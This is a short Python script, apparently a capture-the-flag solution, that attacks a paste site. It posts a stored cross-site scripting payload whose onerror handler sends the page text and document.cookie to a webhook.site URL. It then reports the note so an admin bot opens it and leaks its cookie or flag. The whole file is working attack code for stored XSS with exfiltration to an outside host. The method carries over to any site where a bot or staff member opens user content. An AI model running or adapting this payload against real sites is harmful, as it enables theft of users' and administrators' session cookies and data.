import requests
import time

# Target URLs
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# XSS payload to exfiltrate data
payload = f'<img src=x onerror="fetch(\'{WEBHOOK}?flag=\'+encodeURIComponent(document.body.innerText+\'|\'+document.cookie))">'

print(f"[*] Creating paste with XSS payload...")
print(f"[*] Webhook: {WEBHOOK}")

# Create a new paste
session = requests.Session()
response = session.post(
    f"{BASE_URL}/note/new",
    data={
        "title": "Test Note",
        "body": payload
    },
    allow_redirects=False
)

if response.status_code == 302:
    location = response.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    print(f"[+] Paste created: {note_url}")
    
    # Report the note to trigger bot visit
    print(f"[*] Reporting note to bot...")
    report_response = session.post(
        f"{BASE_URL}/report",
        data={"url": location}
    )
    
    if report_response.status_code == 202:
        print(f"[+] Report queued! Bot will visit the page.")
        print(f"[*] Check your webhook at: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print(f"[*] Waiting 35 seconds for bot to visit...")
        time.sleep(35)
        print(f"[+] Bot should have visited. Check webhook for flag!")
    else:
        print(f"[-] Failed to report: {report_response.status_code}")
        print(report_response.text)
else:
    print(f"[-] Failed to create paste: {response.status_code}")
    print(response.text)